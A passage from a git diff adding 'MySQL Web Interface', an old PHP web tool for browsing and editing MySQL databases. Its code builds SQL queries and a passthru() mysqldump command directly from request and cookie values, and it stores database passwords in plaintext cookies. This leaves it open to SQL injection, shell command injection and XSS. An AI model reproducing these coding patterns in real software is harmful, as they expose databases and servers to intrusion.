+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" 
+) 
+echo "checked";?>>DOUBLE</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DECIMAL" <? if( $type == 
+"decimal" ) 
+echo "checked";?>>DECIMAL(NUMERIC)</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATE" <? if( $type == "date" ) 
+echo 
+"checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATETIME" <? if( $type == 
+"datetime" 
+) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 
+23:59:59, 
+YYYY-MM-DD HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIMESTAMP" <? if( $type == 
+"timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 
+2106..., 
+YYYYMMDD[HH[MM[SS]]])</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIME" <? if( $type == "time" ) 
+echo 
+"checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) 
+echo 
+"checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) 
+echo 
+"checked";?>>CHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="VARCHAR" <? if( $type == 
+"varchar" ) 
+echo "checked";?>>VARCHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYTEXT" <? if( $type == 
+"tinytext" 
+) echo "checked";?>>TINYTEXT (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) 
+echo 
+"checked";?>>TEXT (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == 
+"mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGTEXT" <? if( $type == 
+"longtext" 
+) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYBLOB" <? if( $type == 
+"tinyblob" 
+) echo "checked";?>>TINYBLOB (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) 
+echo 
+"checked";?>>BLOB (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == 
+"mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGBLOB" <? if( $type == 
+"longblob" 
+) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) 
+echo 
+"checked";?>>ENUM</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SET" <? if( $type == "set" ) 
+echo 
+"checked";?>>SET</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+
+</table>
+<table>
+<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value 
+list (ex: 'apple', 'orange', 'banana') </th></tr>
+<tr>
+<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo 
+"value=$M";?>></td>
+<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo 
+"value=$D";?>></td>
+<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? 
+if( 
+strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? 
+if( 
+strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=binary value="BINARY" <? if( 
+strpos( $fieldtype, "binary" )  ) echo "checked";?>></td>
+<td align=center><input type=text size=60 name=valuelist <? if( 
+$valuelist 
+!= "" ) echo "value=\"$valuelist\"";?>></td>
+</tr>
+</table>
+
+
+<h3>Flags</h3>
+<table>
+<tr><th>not null</th><th>default value</th><th>auto 
+increment</th><th>primary key</th></tr>
+<tr>
+<td align=center><input type=checkbox name=not_null value="NOT NULL" <? 
+if( 
+$fieldnull != "YES" ) echo "checked";?>></td>
+<td align=center><input type=text name=default_value <? if( 
+$fielddefault != 
+"" ) echo "value=$fielddefault";?>></td>
+<td align=center><input type=checkbox name=auto_increment 
+value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo 
+"checked";?>></td>
+<td align=center><input type=checkbox name=primary_key value="PRIMARY 
+KEY" 
+<? if( $fieldkey == "PRI" ) echo "checked";?>></td>
+</tr>
+</table>
+
+<p>
+
+<?
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Field'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Field'>\n";
+	echo "<input type=button value=Cancel onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageField_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, 
+$PHP_SELF, $queryStr, $errMsg,
+		$M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, 
+$auto_increment, $primary_key, $valuelist;
+
+	if( $cmd == "add" )
+		$queryStr = "ALTER TABLE $tablename ADD $name ";
+	else if( $cmd == "edit" )
+		$queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
+
+	if( $M != "" )
+		if( $D != "" )
+			$queryStr .= "$type($M,$D) ";
+		else
+			$queryStr .= "$type($M) ";
+	else if( $valuelist != "" ) {
+		$valuelist = stripslashes( $valuelist );
+		$queryStr .= "$type($valuelist) ";
+	} else
+		$queryStr .= "$type ";
+
+	$queryStr .= "$unsigned $zerofill $binary ";
+
+	if( $default_value != "" )
+		$queryStr .= "DEFAULT '$default_value' ";
+
+	$queryStr .= "$not_null $auto_increment";
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	// key change
+	$keyChange = false;
+	$result = mysql_query( "SHOW KEYS FROM $tablename" );
+	$primary = "";
+	while( $row = mysql_fetch_array($result) )
+		if( $row["Key_name"] == "PRIMARY" ) {
+			if( $row[Column_name] == $name )
+				$keyChange = true;
+			else
+				$primary .= ", $row[Column_name]";
+		}
+	if( $primary_key == "PRIMARY KEY" ) {
+		$primary .= ", $name";
+		$keyChange = !$keyChange;
+	}
+	$primary = substr( $primary, 2 );
+	if( $keyChange == true ) {
+		$q = "ALTER TABLE $tablename DROP PRIMARY KEY";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+		$q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+	}
+
+	viewSchema();
+}
+
+function dropField() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, 
+$queryStr, 
+$errMsg;
+
+	$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewSchema();
+}
+
+function viewData( $queryStr ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, 
+$rowperpage, $orderby;
+
+	echo "<h1>Data in Table</h1>\n";
+	if( $tablename != "" )
+		echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	else
+		echo "<p class=location>$dbname</p>\n";
+
+	$queryStr = stripslashes( $queryStr );
+	if( $queryStr == "" ) {
+		$queryStr = "SELECT * FROM $tablename";
+		if( $orderby != "" )
+			$queryStr .= " ORDER BY $orderby";
+		echo "<a 
+href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add 
+Data</a> | \n";
+		echo "<a 
+href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+	}
+
+	$pResult = mysql_db_query( $dbname, $queryStr );
+	$errMsg = mysql_error();
+
+	$GLOBALS[queryStr] = $queryStr;
+
+	if( $pResult == false ) {
+		echoQueryResult();
+		return;
+	}
+	if( $pResult == 1 ) {
+		$errMsg = "Success";
+		echoQueryResult();
+		return;
+	}
+
+	echo "<hr>\n";
+
+	$row = mysql_num_rows( $pResult );
+	$col = mysql_num_fields( $pResult );
+
+	if( $row == 0 ) {
+		echo "No Data Exist!";
+		return;
+	}
+
+	if( $rowperpage == "" ) $rowperpage = 20;
+	if( $page == "" ) $page = 0;
+	else $page--;
+	mysql_data_seek( $pResult, $page * $rowperpage );
+
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	for( $i = 0; $i < $col; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		echo "<th>";
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
+		echo "</th>\n";
+	}
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $rowperpage; $i++ ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		echo "<tr>\n";
+		$key = "";
+		for( $j = 0; $j < $col; $j++ ) {
+			$data = $rowArray[$j];
+
+			$field = mysql_fetch_field( $pResult, $j );
+			if( $field->primary_key == 1 )
+				$key .= "&" . $field->name . "=" . $data;
+
+			if( strlen( $data ) > 20 )
+				$data = substr( $data, 0, 20 ) . "...";
+			$data = htmlspecialchars( $data );
+			echo "<td>\n";
+			echo "$data\n";
+			echo "</td>\n";
+		}
+
+		if( $key == "" )
+			echo "<td colspan=2>no Key</td>\n";
+		else {
+			echo "<td><a 
+href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n";
+			echo "<td><a 
+href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' 
+onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
+		}
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+
+	echo "<font size=2>\n";
+	echo "<form 
+action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' 
+method=post>\n";
+	echo "<font color=green>\n";
+	echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
+	echo "</font>\n";
+	echo " | ";
+	if( $page > 0 ) {
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Prev</a>\n";
+	} else
+		echo "Prev";
+	echo " | ";
+	if( $page < ($row/$rowperpage)-1 ) {
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Next</a>\n";
+	} else
+		echo "Next";
+	echo " | ";
+	if( $row > $rowperpage ) {
+		echo "<input type=text size=4 name=page>\n";
+		echo "<input type=submit value='Go'>\n";
+	}
+	echo "</form>\n";
+	echo "</font>\n";
+}
+
+function manageData( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Data</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Data</h1>\n";
+		$pResult = mysql_list_fields( $dbname, $tablename );
+		$num = mysql_num_fields( $pResult );
+
+		$key = "";
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			if( $field->primary_key == 1 )
+				if( $field->numeric == 1 )
+					$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+				else
+					$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+		}
+		$key = substr( $key, 0, strlen($key)-4 );
+
+		mysql_select_db( $dbname, $mysqlHandle );
+		$pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE 
+$key", $mysqlHandle );
+		$data = mysql_fetch_array( $pResult );
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echo "<form action='$PHP_SELF' method=post>\n";
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addData_submit>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=hidden name=action value=editData_submit>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	echo "<th>Name</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Function</th>\n";
+	echo "<th>Data</th>\n";
+	echo "</tr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	$pResultLen = mysql_list_fields( $dbname, $tablename );
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		$fieldname = $field["Field"];
+		$fieldtype = $field["Type"];
+		$len = mysql_field_len( $pResultLen, $i );
+
+		echo "<tr>";
+		echo "<td>$fieldname</td>";
+		echo "<td>".$field["Type"]."</td>";
+		echo "<td>\n";
+		echo "<select name=${fieldname}_function>\n";
+		echo "<option>\n";
+		echo "<option>ASCII\n";
+		echo "<option>CHAR\n";
+		echo "<option>SOUNDEX\n";
+		echo "<option>CURDATE\n";
+		echo "<option>CURTIME\n";
+		echo "<option>FROM_DAYS\n";
+		echo "<option>FROM_UNIXTIME\n";
+		echo "<option>NOW\n";
+		echo "<option>PASSWORD\n";
+		echo "<option>PERIOD_ADD\n";
+		echo "<option>PERIOD_DIFF\n";
+		echo "<option>TO_DAYS\n";
+		echo "<option>USER\n";
+		echo "<option>WEEKDAY\n";
+		echo "<option>RAND\n";
+		echo "</select>\n";
+		echo "</td>\n";
+		$value = htmlspecialchars($data[$i]);
+		if( $cmd == "add" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len 
+name=$fieldname></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len 
+name=$fieldname></textarea>\n";
+			}
+		} else if( $cmd == "edit" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					if( $value == $str )
+						echo "<option selected>$str\n";
+					else
+						echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len name=$fieldname 
+value=\"$value\"></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len 
+name=$fieldname>$value</textarea>\n";
+			}
+		}
+		echo "</tr>";
+	}
+	echo "</table><p>\n";
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Data'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Data'>\n";
+	echo "<input type=button value='Cancel' onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageData_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, 
+$queryStr, 
+$errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	if( $cmd == "add" )
+		$queryStr = "INSERT INTO $tablename VALUES (";
+	else if( $cmd == "edit" )
+		$queryStr = "REPLACE INTO $tablename VALUES (";
+	for( $i = 0; $i < $num-1; $i++ ) {
+		$field = mysql_fetch_field( $pResult );
+		$func = $GLOBALS[$field->name."_function"];
+		if( $func != "" )
+			$queryStr .= " $func(";
+		if( $field->numeric == 1 ) {
+			$queryStr .= $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "),";
+			else
+				$queryStr .= ",";
+		} else {
+			$queryStr .= "'" . $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "'),";
+			else
+				$queryStr .= "',";
+		}
+	}
+	$field = mysql_fetch_field( $pResult );
+	if( $field->numeric == 1 )
+		$queryStr .= $GLOBALS[$field->name] . ")";
+	else
+		$queryStr .= "'" . $GLOBALS[$field->name] . "')";
+
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function deleteData() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, 
+$queryStr, 
+$errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	$key = "";
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		if( $field->primary_key == 1 )
+			if( $field->numeric == 1 )
+				$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+			else
+				$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+	}
+	$key = substr( $key, 0, strlen($key)-4 );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	$queryStr =  "DELETE FROM $tablename WHERE $key";
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function dump() {
+	global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;
+
+	if( $action == "dumpTable" )
+		$filename = $tablename;
+	else
+		$filename = $dbname;
+
+	header("Content-disposition: filename=$filename.sql");
+	header("Content-type: application/octetstream");
+	header("Pragma: no-cache");
+	header("Expires: 0");
+
+	$pResult = mysql_query( "show variables" );
+	while( 1 ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		if( $rowArray[0] == "basedir" )
+			$bindir = $rowArray[1]."bin/";
+	}
+
+	passthru( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD 
+$dbname 
+$tablename" );
+}
+
+function utils() {
+	global $PHP_SELF, $command;
+	echo "<h1>Utilities</h1>\n";
+	if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
+		echo "<hr>\n";
+		echo "Show\n";
+		echo "<ul>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
+		echo "</ul>\n";
+		echo "Flush\n";
+		echo "<ul>\n";
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
+		if( $command == "flush_hosts" ) {
+			if( mysql_query( "Flush hosts" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
+		if( $command == "flush_logs" ) {
+			if( mysql_query( "Flush logs" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
+		if( $command == "flush_privileges" ) {
+			if( mysql_query( "Flush privileges" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
+		if( $command == "flush_tables" ) {
+			if( mysql_query( "Flush tables" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a 
+href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
+		if( $command == "flush_status" ) {
+			if( mysql_query( "Flush status" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "</ul>\n";
+	} else {
+		$queryStr = ereg_replace( "_", " ", $command );
+		$pResult = mysql_query( $queryStr );
+		if( $pResult == false ) {
+			echo "Fail";
+			return;
+		}
+		$col = mysql_num_fields( $pResult );
+
+		echo "<p class=location>$queryStr</p>\n";
+		echo "<hr>\n";
+
+		echo "<table cellspacing=1 cellpadding=2 border=0>\n";
+		echo "<tr>\n";
+		for( $i = 0; $i < $col; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			echo "<th>".$field->name."</th>\n";
+		}
+		echo "</tr>\n";
+
+		while( 1 ) {
+			$rowArray = mysql_fetch_row( $pResult );
+			if( $rowArray == false ) break;
+			echo "<tr>\n";
+			for( $j = 0; $j < $col; $j++ )
+				echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
+			echo "</tr>\n";
+		}
+		echo "</table>\n";
+	}
+}
+
+function header_html() {
+	global $PHP_SELF;
+
+?>
+<html>
+<head>
+<title>MySQL Web Interface</title>
+<style type="text/css">
+<!--
+p.location {
+	color: #11bb33;
+	font-size: small;
+}
+h1 {
+	color: #A4A260;
+}
+th {
+	background-color: #BDBE42;
+	color: #FFFFFF;
+	font-size: x-small;
+}
+td {
+	background-color: #DEDFA5;
+	font-size: x-small;
+}
+form {
+	margin-top: 0;
+	margin-bottom: 0;
+}
+a {
+	text-decoration:none;
+	color: #848200;
+	font-size:x-small;
+}
+a:link {
+}
+a:hover {
+	background-color:#EEEFD5;
+	color:#646200;
+	text-decoration:none
+}
+//-->
+</style>
+</head>
+<body>
+<?
+}
+
+function footer_html() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
+
+	echo "<hr>\n";
+	echo "<font size=2>\n";
+	echo "<font color=blue>[$USERNAME]</font> - \n";
+
+	echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
+	if( $tablename != "" )
+		echo "<a 
+href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table 
+List</a> | ";
+	echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
+	echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
+	echo "</font>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+//------------------------------------------------------ MAIN
+
+if( $action == "logon" || $action == "" || $action == "logout" )
+	logon();
+else if( $action == "logon_submit" )
+	logon_submit();
+else if( $action == "dumpTable" || $action == "dumpDB" ) {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	dump();
+} else {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	echo "<!--";
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	echo "-->";
+
+	if( $mysqlHandle == false ) {
+		echo "<html>\n";
+		echo "<head>\n";
+		echo "<title>MySQL Web Interface</title>\n";
+		echo "</head>\n";
+		echo "<body>\n";
+		echo "<table width=100% height=100%><tr><td><center>\n";
+		echo "<h1>Wrong Password!</h1>\n";
+		echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
+		echo "</center></td></tr></table>\n";
+		echo "</body>\n";
+		echo "</html>\n";
+	} else {
+		header_html();
+		if( $action == "listDBs" )
+			listDatabases();
+		else if( $action == "createDB" )
+			createDatabase();
+		else if( $action == "dropDB" )
+			dropDatabase();
+		else if( $action == "listTables" )
+			listTables();
+		else if( $action == "createTable" )
+			createTable();
+		else if( $action == "dropTable" )
+			dropTable();
+		else if( $action == "viewSchema" )
+			viewSchema();
+		else if( $action == "query" )
+			viewData( $queryStr );
+		else if( $action == "addField" )
+			manageField( "add" );
+		else if( $action == "addField_submit" )
+			manageField_submit( "add" );
+		else if( $action == "editField" )
+			manageField( "edit" );
+		else if( $action == "editField_submit" )
+			manageField_submit( "edit" );
+		else if( $action == "dropField" )
+			dropField();
+		else if( $action == "viewData" )
+			viewData( "" );
+		else if( $action == "addData" )
+			manageData( "add" );
+		else if( $action == "addData_submit" )
+			manageData_submit( "add" );
+		else if( $action == "editData" )
+			manageData( "edit" );
+		else if( $action == "editData_submit" )
+			manageData_submit( "edit" );
+		else if( $action == "deleteData" )
+			deleteData();
+		else if( $action == "utils" )
+			utils();
+
+		mysql_close( $mysqlHandle);
+		footer_html();
+	}
+}
+
+?>
diff --git a/php/MySQL_Web_Interface_Version_0.8.php b/php/MySQL_Web_Interface_Version_0.8.php
new file mode 100644
index 0000000..9f37027
--- /dev/null
+++ b/php/MySQL_Web_Interface_Version_0.8.php
@@ -0,0 +1,1302 @@
+<?
+/*
+* MySQL Web Interface Version 0.8
+* -------------------------------
+* Developed By SooMin Kim (smkim@popeye.snu.ac.kr)
+* License : GNU Public License (GPL)
+* Homepage : http://popeye.snu.ac.kr/~smkim/mysql
+*/
+
+$HOSTNAME = "localhost";
+
+function logon() {
+	global $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username" );
+	setcookie( "mysql_web_admin_password" );
+	echo "<html>\n";
+	echo "<head>\n";
+	echo "<title>MySQL Web Interface</title>\n";
+	echo "</head>\n";
+	echo "<body>\n";
+	echo "<table width=100% height=100%><tr><td><center>\n";
+	echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
+	echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+	echo "<h1>MySQL Web Interface</h1>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=logon_submit>\n";
+	echo "<table cellpadding=5 cellspacing=1>\n";
+	echo "<tr><td>Username </td><td> <input type=text 
+name=username></td></tr>\n";
+	echo "<tr><td>Password </td><td> <input type=password 
+name=password></td></tr>\n";
+	echo "</table><p>\n";
+	echo "<input type=submit value='Enter'>\n";
+	echo "<input type=reset value='Clear'><br>\n";
+	echo "</form>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</center></td></tr></table>\n";
+	echo "<p><hr width=300>\n";
+	echo "<font size=2>\n";
+	echo "Copyleft &copy; since 1999,\n";
+	echo "<a href='mailto:smkim76@icqmail.com'>SooMin Kim</a><br>\n";
+	echo "<a href='http://popeye.snu.ac.kr/~smkim/mysql'>Hompage<a> is 
+available<br>";
+	echo "</font>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+function logon_submit() {
+	global $username, $password, $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username", $username );
+	setcookie( "mysql_web_admin_password", $password );
+	echo "<html>";
+	echo "<head>";
